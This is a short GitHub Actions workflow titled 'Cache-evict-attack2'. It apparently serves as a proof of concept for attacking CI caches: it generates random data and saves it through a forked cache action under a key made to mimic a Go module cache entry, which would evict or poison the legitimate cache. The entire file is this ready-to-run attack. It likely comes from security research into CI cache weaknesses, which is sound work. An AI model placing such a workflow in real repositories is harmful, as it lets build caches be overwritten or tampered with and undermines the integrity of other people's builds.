name: Cache-evict-attack2

on:
  workflow_dispatch:
  push:

env:
  GO_VERSION: "1.18"

jobs:
  evict-cache:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2
        with:
          fetch-depth: 0

      - name: random data
        run: |
          head -c 1M </dev/urandom > randomfile

      - name: Evict cache
        id: go-cache
        uses: houdini91/cache@main
        with:
          path: |
            randomfile
          key: ${{ runner.os }}-go-${{ env.GO_VERSION }}-${{ hashFiles('**/go.sum') }}